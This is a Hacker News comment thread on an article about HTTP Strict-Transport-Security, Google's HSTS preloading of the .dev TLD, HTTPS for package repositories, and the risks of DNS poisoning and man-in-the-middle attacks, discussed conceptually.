[HN Gopher] The fascinating world of HTTP Strict-Transport-Security
___________________________________________________________________
The fascinating world of HTTP Strict-Transport-Security
Author : vieiralucas
Score : 81 points
Date : 2023-03-30 12:25 UTC (10 hours ago)
(HTM) web link (ergomake.dev)
(TXT) w3m dump (ergomake.dev)
| Avamander wrote:
| HSTS is nice but it's mostly opt-in. Vast majority won't enable
| it. For that reason I decided to test out blocking outgoing port
| 80 connections, it's interesting what stops working. Some of
| these also raise questions, why do they stop working.
|
| My favourite issue I stumbled upon is that Apple HomePods can't
| complete their first setup. Couldn't be bothered dumping what
| exactly they're doing, but it does raise a few questions. Though
| there are quite a few other things that break, like
| Debian/Ubuntu/apt repositories, Windows Update and Store and some
| games.
| LinuxBender wrote:
| Linux repos are expected to use cache-friendly methods but not
| restricted from also using a secure transport. Security of the
| objects is obtained from GPG signing of individual packages and
| GPG signing of the repository meta-data. The risk comes from
| GPG keys being on the cached repositories rather than only
| existing on a trusted source and I have seen people install GPG
| keys from mirrors. I tried and failed for example to convince
| Redhat to stop putting the public keys on the mirrors. Many
| companies mirror their secondary community hosted mirrors
| internally to build systems and are prime candidates for take-
| over and GPG re-signing.
| Avamander wrote:
| GPG's track record of being robust against attacks is not
| that great, not to mention the complexity and surface of HTTP
| stacks. It would be great to make that attack surface
| available only to malicious mirrors.
| LinuxBender wrote:
| _It would be great to make that attack surface available
| only to malicious mirrors._
|
| That is exactly why I was pushing to remove the keys from
| the mirrors but unofficially it's _too late_ as any changes
| could cause disruptions for people that have private
| internal mirrors. I suggested just communicating the change
| for a year prior which would have occurred years in the
| past as of now.
| RealStickman_ wrote:
| It's worth noting that deb packages are signed by the distro
| and any modification would be detected. That makes HTTPS
| unnecessary in this case.
| iso1631 wrote:
| The argument would be that it's easier to see what someone is
| downloading (and thus infer installing) by sniffing the http
| traffic rather than https
|
| Sure you can do some form of fingerprinting with request
| sizes over https, but that's another step and no guarentee
| (which of two identical length files did they get for
| example)
|
| What the risk is to this information is another matter.
| sgtcodfish wrote:
| Having the communication in cleartext also makes it much
| easier for attackers to interfere with!
|
| Sure, they can't modify the .deb without failing signature
| verification, but they _can_ inject arbitrary delays in
| downloads or interfere with anything else which isn't
| signed (e.g. HTTP headers)
|
| Plus, if a vulnerability was discovered in the signing tool
| which enabled signature verification bypass with a certain
| signature format, HTTP makes it easy for attackers to
| perform that attack.
|
| TLS shouldn't be optional for installing packages today IMO
| - the extra guarantees it provides are worth it even with
| signature verification enabled.
| Avamander wrote:
| But you have exposed the entire HTTP and GPG stack to the
| attacker. It would be unnecessary if those were as secure and
| under as much scrutiny as TLS libraries are.
| ducksinhats wrote:
| Also worth noting that there have been apt RCE's capable of
| being exploited by a MITM.
|
| https://www.debian.org/security/2016/dsa-3733
|
| https://justi.cz/security/2019/01/22/apt-rce.html
|
| I really don't see how anyone can still defend not using TLS
| for debian packages.
| kevincox wrote:
| In Firefox you can enable "HTTPS Only Mode" which auto-
| redirects all requests to HTTPS and provides a warning that you
| need to click through before downgrading to HTTP.
|
| It is quick interesting to see what is not HTTPS. One common
| one I have seen is tracking links in emails are often not
| HTTPS. I have even see password reset links wrapped in tracking
| links that redirect through HTTP. So these could be intercepted
| and used to reset your password before you do.
| ArchOversight wrote:
| Last I looked Apple updates are delivered over HTTP using a
| CDN. The packages are signed and secured in alternate ways, but
| the goal was to make it easy to allow entities to proxy those
| connections (and or use DNS to replace the IP's) so they could
| keep a cache of packages on their local network rather than
| having to go upstream for them.
|
| This worked really well when I did some work at a uni and we
| wanted to avoid the onslaught of Apple devices all downloading
| updates at the same time from overwhelming our network.
| Avamander wrote:
| A method like that should kinda never end up causing a denial
| of service. I also didn't drop any local port 80 traffic,
| which also makes that theory a bit less likely.
| jcrawfordor wrote:
| Sticking to HTTP enables transparent caching. So it's not
| that MacOS/iOS try to connect to anything on the local
| network, they just connect directly to Apple via HTTP which
| allows the local network to hijack the connection and serve
| a locally cached copy instead. This kind of thing is more
| common than you might think on corporate and institutional
| networks because it can produce appreciable savings in
| bandwidth to the internet. Squid is a very common open-
| source solution for transparent forward proxy, but there
| are commercial products that are more common.
|
| This kind of "friendly MITM" is sort of the baby that goes
| out with the bathwater on mandatory HTTPS, although I am
| personally of the opinion that it's not a big enough deal
| to block mandatory HTTPS---but there is debate there.
| stanleydrew wrote:
| > It's worth noticing that even the preload directive is non-
| standard, even though it's used as part of this entire "preload
| infrastructure" all across the web.
|
| This isn't exactly accurate. The HSTS RFC explicitly contemplates
| the preload list: https://www.rfc-
| editor.org/rfc/rfc6797#section-12.3
| josephcsible wrote:
| > Although serving HTTP content is not ideal, we probably
| shouldn't really stay in the way of our users if that's what they
| want to do.
|
| I don't agree with this position. I'd summarize my position as
| "if you want to do something stupid and dangerous, I don't want
| to be involved in it."
| lordgrenville wrote:
| Can someone explain how the DNS poisoning actually happens in
| practice? Is it via an insecure Wi-fi network? Because I assume
| that most people's upstream DNS is provided by their ISP, which
| is probably basically competent. I use an Unbound server at home,
| but I really struggle to imagine a rogue actor compromising my
| ISP without anyone noticing.
| flumpcakes wrote:
| DNS is public traffic, on a well known port. I just have to
| have your network traffic go through a device I own and I can
| set your DNS results to anything I want, even if you
| specifically specify a DNS server on your end.
| nym375 wrote:
| Not directly answering re: DNS, but even if you get correct DNS
| results, at the IP layer there is always a risk of BGP
| hijacking
| (https://en.wikipedia.org/wiki/BGP_hijacking#Public_incidents).
| toast0 wrote:
| The easiest way is if the attacker is in the path between a DNS
| client (which could be your ISPs recursive server) and an
| authoritative server. But anytime there's caching, you have a
| risk of the wrong thing getting cached.
|
| There's the Kaminsky attack, if your ISP's DNS server doesn't
| properly randomize query ids and source ports (and query case,
| for a few extra bits)
|
| But you can also get unintentionally wrong information cached,
| if something flips a bit on the way, as DNS doesn't have end to
| end integrity.
| recursive wrote:
| In a conflict between HTTP vs HTTPS, why solve it by settling on
| HTTP? Switching to all HTTPS usually seems like the better
| option.
| kevincox wrote:
| Because HTTPS is harder. The user could be loading HTTP content
| from another host on their page. In order to support this you
| would basically need to modify their page (including scripts)
| to rewrite all URLs to HTTPS. This is nearly impossible to do
| perfectly. I think they are right to give their customers this
| option if desired.
| superkuh wrote:
| It depends on who you are and who you are trying to reach. If
| you are a for-profit business or institutional "person" then
| you only really need to reach people who are the type that give
| you money or who you provide services too. That means blocking
| people due to HTTPS CA or cert issues is okay. If you're a
| human person or government then you want the information or
| service to be available to as many people as possible and that
| means HTTP+HTTPS even if it means allowing older versions of
| HTTPS.
| Tobu wrote:
| Indeed, here's GitHub doing exactly that (fixing mixed content
| warnings by reverse-proxying third-party HTTP content), back in
| 2010: https://github.blog/2010-11-13-sidejack-prevention-
| phase-3-s...
| wepple wrote:
| It's literally on the front page of https://get.dev that the
| whole TLD is preloaded, I'm not sure why it comes as such a
| surprise.
|
| I get that ergomake has to bend to the whim of their customers,
| but TLS certs are free so engineering your systems to allow non-
| TLS http in 2023 is a huge regression
| [deleted]
| 1vuio0pswjnm7 wrote:
| "After some research, we found this blog post by Mattias Geniar,
| which explained how Google was forcing .dev domains to be served
| via HTTPS through a preloaded HSTS setting in their Chrome
| browsers - which Firefox later adopted too."
|
| Imagine if Google did not have and control its own browser,
| Chrome. In theory then Google could not force the author to
| purchase a .dev.domain. What's sad here is that according to the
| author Mozilla has followed Google's lead. Note this has nothing
| to do with fact that Mozilla's main source of income is Google,
| and Chrome was developed by former Mozilla employees who went to
| work for Google.
|
| It is possible to use a browser other than Chrome or Firefox (or
| Safari, Edge, Brave, etc.) that has no XSS risk because the
| browser does not auto-load resources. This alleviates need for
| HSTS as a means to prevent XSS (NB. there are other purported
| justifications for using HSTS besides preventing XSS). How do I
| know it is possible. Because I use one. For recreational web use,
| like reading sites submitted to HN. Freedom of choice.
|
| It's also possible to run a localhost-bound forward proxy where
| one can set HSTS to whatever value one desires, or remove the
| header entirely. Instead of relying on an advertising company,
| one can use the proxy to "upgrade" http:// to https://. All
| outgoing HTTP requests can be encrypted and connections to local
| port 80 can be forwarded to remote 443. I know it's possible
| because this is what I do. Unlike HSTS, the proxy "fixes" any
| application sending HTTP requests, not only a browser that
| supports HSTS. The proxy can also limit the sites the user wishes
| to trust.^1
|
| That is the real issue I have with HSTS. It further removes
| (i.e., makes more difficult) the ability of the user to determine
| what sites she will trust, placing that decision in the hands of
| third parties, namely those that control the "CA system". It's
| already annoying enough that Chrome forces users to type a
| shibboleth into a keylogger to get past certificate warnings.
| HSTS makes it even more annoying. It is unfriendly for users who
| in some situations trust their own decision-making more than they
| trust Google and CAs.
| sebstefan wrote:
| Thank god for clear errors. Can you imagine if you just got "Bad
| request" and had to figure that shit out with no clues?
| psd1 wrote:
| Thank the gods for Fiddler
| adql wrote:
| It also have funny interactions with expired certs, I remember
| some obscure OSS app page being inacessible via browser because:
|
| * author forgot to renew the cert like, day before
|
| * author also set up HSTS and both browsers said "nope, we won't
| even let you add exception for this one".
| dumpsterdiver wrote:
| That's kind of the point of HSTS. Your browser remembered that
| there was previously a valid certificate, and when the
| certificate expired your browser honored the HSTS header. If
| you clear your browser cache you should be able to access the
| site again.
| tialaramex wrote:
| Not so much "funny" as necessary.
|
| The alternative is that if I can mess up their HTTPS
| connections to your site with HSTS, users just click the
| "exception" button and it undoes all the benefits of HSTS.
| VWWHFSfQ wrote:
| I don't know if it's still the case, but it used to be that if
| you accidently set a localhost webserver to redirect to HTTPS
| while you were developing then browsers would remember that and
| from then on require HTTPS for all of eternity until you could
| figure out how to make it stop which was mostly impossible. It
| ended up in some HSTS file somewhere deep in the browsers cache
| files. Horrible technology.
| stanleydrew wrote:
| I think you're just talking about aggressive browser caching of
| 301 responses, which isn't related to TLS or HSTS. It is pretty
| common to respond to plaintext HTTP requests with a 301 to the
| equivalent TLS URL, so I understand the confusion.
| amichal wrote:
| Its also this cache chrome://net-internals/#hsts (or other
| vendor equivalent)
| VWWHFSfQ wrote:
| It's both the 301 and the server responds with the hsts
| header
| stanleydrew wrote:
| Well yes it's common to return both, but the HSTS header
| explicitly has a max-age parameter so the browser is bound
| by the spec to enforce TLS connections until the max-age is
| reached. So when you say browsers would "require HTTPS for
| all of eternity" my assumption was that you didn't like the
| 301 caching.
| xg15 wrote:
| Does anyone know why Google did this for .dev of all things? HSTS
| makes sense for any other domain, but specifically picking a tld
| that people are known to use for internal testing, then shelling
| out the money to buy it only so you can force HSTS on it, comes
| out as a real dick move, honestly.
|
| Or was Google so caught up in their good guy complex that they
| felt justified to perform a pedagogical intervention on the
| entire industry?
| soneil wrote:
| They did it for a good handful of TLD, including .app, .day,
| .dev, .page, and .new. I get the impression they're pushing for
| it to be absolutely everywhere, and "greenfield sites" are an
| easier place to start than to break things that already work.
| lucasfcosta wrote:
| I think it's not that bad for this to be the default.
|
| To be honest, people should've never used `.dev` for testing in
| the first place, given that IANA has reserved the `.test`
| domain specifically for that.
|
| By making HTTPS the default for `.dev` they can save a few MS
| in rewriting the requests and a few bytes for the preload
| header.
|
| In any case, I think it'd be okay for it to be the default, but
| I think it's _not_ okay for it to be immutable. I should be
| able to remove my .dev domain from the preload list if I want
| to.
|
| TL;DR: Ok default but IMO it should be possible to opt-out.
| suprfsat wrote:
| Also I was using TURKTRUST and it should be possible to opt
| out of whatever the security nerds thought was best for me
| too.
| toast0 wrote:
| I believe you can opt-out your domain, but in order to opt-
| out you need to serve HTTPS and serve a HSTS header with max-
| age=0. The blog post mentions turning off the HSTS header,
| but not setting it to max-age=0, which is probably what they
| needed to do (plus a redirect from https to http, for
| specific pages they want served via http)
| account42 wrote:
| > To be honest, people should've never used `.dev` for
| testing in the first place, given that IANA has reserved the
| `.test` domain specifically for that.
|
| The TLD namespace was effectively frozen for a long time
| until ICANN got greedy and decided to sell parts of it off.
| zamnos wrote:
| RFC 2606: https://www.rfc-editor.org/rfc/rfc2606.html
|
| The problem with standards is no one ever reads them. This
| was published in 1999.
| amichal wrote:
| And for local application env you should use .localhost
| .test was for testing DNS infra. "undefined behavioir" for
| you local resolver
| suprfsat wrote:
| You mean we're not supposed to run our Active Directory
| on 'corp.com'?
| ArchOversight wrote:
| No, you run it on .corp like everyone else. :P
| chrismorgan wrote:
| _Why_ should you be able to opt out? I can't think of any
| valid reason.
| hannob wrote:
| If you think about it what Google did was actually quite smart.
|
| By forcing HSTS for .dev they broke setups of people who
| hijacked a domain name they didn't own and that wasn't made for
| that purpose (and, as others pointed out, there are TLDs
| reserved for testing that you can use). So they forced those
| people to fix their stuff. If they hadn't done that .dev
| probably would have gained the reputation of the TLD that
| doesn't work, because all kinds of people redirected it to some
| testing hosts.
| sebstefan wrote:
| Why does that affect the .dev TLD specifically?
| matharmin wrote:
| Because many people (myself included) used .dev for
| internal testing domains before it was a TLD, either by
| specifying the domains in my hosts file, or with a local
| DNS server. Now i use .test for that, which is actually a
| reserved suffix that would never be a real TLD.
| qwertox wrote:
| I have a shortname.cc domain which I use for testing.
| This allows me to issue Let's Encrypt certificates for
| *.shortname.cc, which includes local.shortname.cc.
|
| The internal DNS server masks the public one, so that I
| can assign local IPs at will, use HTTP or HTTPS at will,
| and when I'm outside of the network, the devices will
| contact the public DNS server and use the actual public
| IP of the network to access a limited set of servers
| (like ejabberd). These servers then stay accessible on
| the inside but through the local IPs, so that they don't
| have to leave the local network touching the edge router
| (which also solves some NAT issues on WebSocket
| connections).
| chatmasta wrote:
| Just to expand on why you should use .test for this, it's
| a reserved TLD according to RFC 2606 [0] and should
| therefore be guaranteed never to be issued by any
| registrar. Alternatively, you could use any of the other
| 11 reserved TLDs: .Ce Shi , .priikssaa, .ispytanie,
| .teseuteu, .t`st, .Ce Shi , .azmyshy, .prittcai, .dokime,
| .khtbr, .tesuto
|
| e.g. we use `https://www.splitgraph.test` for local
| development, which is nice because we avoid a whole class
| of "works in dev" bugs that you get with
| `http://localhost:3001`
|
| For the certificate, we use a self-signed certificate
| signed by a root cert generated by mkcert [1] locally on
| each developer's machine (to avoid sharing a root cert
| that could be used to MITM each other).
|
| [0] https://en.wikipedia.org/wiki/.test
|
| [1] https://github.com/FiloSottile/mkcert
| RulerOf wrote:
| I created a subdomain like local.example.com and pointed
| it at 127.0.0.1 in the DNS.
|
| I wanted to suggest using a .test domain but managing the
| hosts file is always really clunky, even with a slick
| tool like hostess[1].
|
| 1: https://github.com/cbednarski/hostess
| acatton wrote:
| Because Google manages the .dev TLD.
| https://en.wikipedia.org/wiki/.dev
|
| It's their TLD, they do whatever they want.
___________________________________________________________________
(page generated 2023-03-30 23:01 UTC)